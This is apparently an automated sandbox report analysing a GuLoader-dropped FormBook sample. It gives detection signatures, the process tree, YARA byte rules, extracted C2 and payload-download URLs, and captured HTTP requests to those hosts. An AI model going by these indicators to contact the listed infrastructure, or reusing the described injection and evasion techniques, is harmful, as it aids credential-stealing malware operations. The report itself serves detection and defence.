Play interactive tour

Edit tour

Windows Analysis Report RYATPPETU.exe

Overview

General Information

Sample Name:	RYATPPETU.exe
Analysis ID:	510462
MD5:	7a4b8b634d2e94cd1e458af5918be3aa
SHA1:	b6989ba569206ab6527aff0f8bd3278371ef7953
SHA256:	056477676a6b327511c22c10e77e4e5f3653b40528109d7715a9e9efffb4d068
Tags:	exeGuLoader
Infos:
Most interesting Screenshot:

Detection

GuLoader FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Generic Dropper

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

GuLoader behavior detected

Yara detected GuLoader

Hides threads from debuggers

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Modifies the prolog of user mode functions (user mode inline hooks)

Self deletion via cmd delete

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

RYATPPETU.exe (PID: 1860 cmdline: 'C:\Users\user\Desktop\RYATPPETU.exe' MD5: 7A4B8B634D2E94CD1E458AF5918BE3AA)

RYATPPETU.exe (PID: 2248 cmdline: 'C:\Users\user\Desktop\RYATPPETU.exe' MD5: 7A4B8B634D2E94CD1E458AF5918BE3AA)

explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmmon32.exe (PID: 5516 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)

cmd.exe (PID: 5608 cmdline: /c del 'C:\Users\user\Desktop\RYATPPETU.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lrbounee.xyz/kb8y/"], "decoy": ["kurdestates.com", "jojoinu.site", "humanblossoms.com", "pnmingyue.com", "breathewellductcleaning.com", "2631blg.xyz", "growwithgardiner.net", "dirtyfrenchdubai.com", "atlynnmusic.online", "vongquayfreefire247.com", "tafzba064.xyz", "realdealtrujillo.com", "liveartexperiences.com", "saimashafique.com", "istanbulmasajreklam.xyz", "fhwy6.com", "tecladistaemfoco.com", "libertyshelly.com", "raduanis.com", "hairshop-wave.com", "waytubeissue.top", "taurustwinscreation.com", "pashtointl.com", "yourfacedesigns.com", "elitbahistv9.com", "cerveceriachapultepectx.com", "vitalingredientsforliving.com", "wezdum.xyz", "matyherbs.com", "beffr.xyz", "mobilenftexchange.com", "tucsonpoolsservices.com", "sn-699.com", "quintasenalquiler.com", "radyometre.com", "victoryinthemaking.com", "stocolour.com", "social-data-company.com", "supportudc.xyz", "larrythecat.net", "candlessenceuk.com", "luciusbullens.com", "indianaexoticshop.com", "punkjoin.com", "effectivetherapeutics.com", "xybernft.com", "enaturism.xyz", "battlegroundbuzz.com", "bookseparat.com", "pepsicoinvest.xyz", "techexpertacademy.com", "yapbicicek.xyz", "kawaii-to-the-core.com", "afterthesethings.com", "inboxboree.com", "brooklyngats.com", "kc1628.com", "gfooveed.xyz", "sarabicompany.com", "emtreeconsulting.com", "chandcollege.com", "revolutiongaming.xyz", "babyunspillabowls.com", "etr6safvu8.com"]}

Threatname: GuLoader

{"Payload URL": "https://blumeconstructionllc.com/bin_NX"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000000.404385380.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000F.00000002.772404240.000000000549F000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x442c:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5839:$sqlite3step: 68 34 1C 7B E1 0x594c:$sqlite3step: 68 34 1C 7B E1 0x5868:$sqlite3text: 68 38 2A 90 C5 0x598d:$sqlite3text: 68 38 2A 90 C5 0x587b:$sqlite3blob: 68 53 D8 7F 8C 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.770057467.0000000003254000.00000004.00000020.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x3f04:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5839:$sqlite3step: 68 34 1C 7B E1 0x594c:$sqlite3step: 68 34 1C 7B E1 0x5868:$sqlite3text: 68 38 2A 90 C5 0x598d:$sqlite3text: 68 38 2A 90 C5 0x587b:$sqlite3blob: 68 53 D8 7F 8C 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: RYATPPETU.exe PID: 2248	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: cmmon32.exe PID: 5516	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Click to see the 22 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.lrbounee.xyz/kb8y/"], "decoy": ["kurdestates.com", "jojoinu.site", "humanblossoms.com", "pnmingyue.com", "breathewellductcleaning.com", "2631blg.xyz", "growwithgardiner.net", "dirtyfrenchdubai.com", "atlynnmusic.online", "vongquayfreefire247.com", "tafzba064.xyz", "realdealtrujillo.com", "liveartexperiences.com", "saimashafique.com", "istanbulmasajreklam.xyz", "fhwy6.com", "tecladistaemfoco.com", "libertyshelly.com", "raduanis.com", "hairshop-wave.com", "waytubeissue.top", "taurustwinscreation.com", "pashtointl.com", "yourfacedesigns.com", "elitbahistv9.com", "cerveceriachapultepectx.com", "vitalingredientsforliving.com", "wezdum.xyz", "matyherbs.com", "beffr.xyz", "mobilenftexchange.com", "tucsonpoolsservices.com", "sn-699.com", "quintasenalquiler.com", "radyometre.com", "victoryinthemaking.com", "stocolour.com", "social-data-company.com", "supportudc.xyz", "larrythecat.net", "candlessenceuk.com", "luciusbullens.com", "indianaexoticshop.com", "punkjoin.com", "effectivetherapeutics.com", "xybernft.com", "enaturism.xyz", "battlegroundbuzz.com", "bookseparat.com", "pepsicoinvest.xyz", "techexpertacademy.com", "yapbicicek.xyz", "kawaii-to-the-core.com", "afterthesethings.com", "inboxboree.com", "brooklyngats.com", "kc1628.com", "gfooveed.xyz", "sarabicompany.com", "emtreeconsulting.com", "chandcollege.com", "revolutiongaming.xyz", "babyunspillabowls.com", "etr6safvu8.com"]}
Source: 00000008.00000000.404385380.0000000000560000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://blumeconstructionllc.com/bin_NX"}

Multi AV Scanner detection for submitted file

Show sources

Source: RYATPPETU.exe	Virustotal: Detection: 31%			Perma Link
Source: RYATPPETU.exe	ReversingLabs: Detection: 27%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: RYATPPETU.exe

Joe Sandbox ML: detected

Source: 15.2.cmmon32.exe.549f840.4.unpack	Avira: Label: TR/Dropper.Gen
Source: 15.2.cmmon32.exe.3254318.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.2.RYATPPETU.exe.400000.0.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.2.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.3.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.0.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.1.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.RYATPPETU.exe.400000.0.unpack	Avira: Label: TR/Dropper.VB.Gen

Source: RYATPPETU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 45.82.177.176:443 -> 192.168.2.5:49697 version: TLS 1.2

Source:	Binary string: cmmon32.pdb source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RYATPPETU.exe, 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp, cmmon32.exe, 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RYATPPETU.exe, cmmon32.exe

Source: C:\Windows\SysWOW64\cmmon32.exe

Code function: 4x nop then pop ebx

15_2_02EE7B1B

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.etr6safvu8.com
Source: C:\Windows\explorer.exe	Domain query: www.lrbounee.xyz
Source: C:\Windows\explorer.exe	Network Connect: 172.67.161.80 80	Jump to behavior

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe

DNS query: www.lrbounee.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: www.lrbounee.xyz/kb8y/
Source: Malware configuration extractor	URLs: https://blumeconstructionllc.com/bin_NX

Source: Joe Sandbox View	ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /kb8y/?UL30vp=VG0y4HVkQ1AGt1voBcUsNCEJrT9SlfHUi22gJvk+aIOz4uPxc1TzHkPIPjpZ8++2gXXO&4hP=NPuDZXp0DVz HTTP/1.1Host: www.lrbounee.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: GET /bin_NXOEaeagUq10.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: blumeconstructionllc.comCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 18:18:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qqJ2Q9iCH1RRBQKJHt7%2Bpll1gj8DBHVrUY1%2ByxZfQWtFIoZbTjROcASUpSCa3xt1a89lPkmS%2FOwrIt5r%2Btdm6auT0AZrk%2Fg7h%2BdIwpX%2BPk3RXDFVKvodDvIcTZiBaHT4Vg1K"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a4dede68e4e4ee6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 39 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 9f<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.15.8.3</center></body></html>

Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://blumeconstructionllc.com/bin_NXOEaeagUq10.bin
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://blumeconstructionllc.com/bin_NXOEaeagUq10.binhttps://soleprotect.de/bin_NXOEaeagUq10.bin
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://soleprotect.de/bin_NXOEaeagUq10.bin

Source: unknown

DNS traffic detected: queries for: blumeconstructionllc.com

Source: global traffic	HTTP traffic detected: GET /bin_NXOEaeagUq10.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: blumeconstructionllc.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /kb8y/?UL30vp=VG0y4HVkQ1AGt1voBcUsNCEJrT9SlfHUi22gJvk+aIOz4uPxc1TzHkPIPjpZ8++2gXXO&4hP=NPuDZXp0DVz HTTP/1.1Host: www.lrbounee.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

HTTPS traffic detected: 45.82.177.176:443 -> 192.168.2.5:49697 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.772404240.000000000549F000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.770057467.0000000003254000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: RYATPPETU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
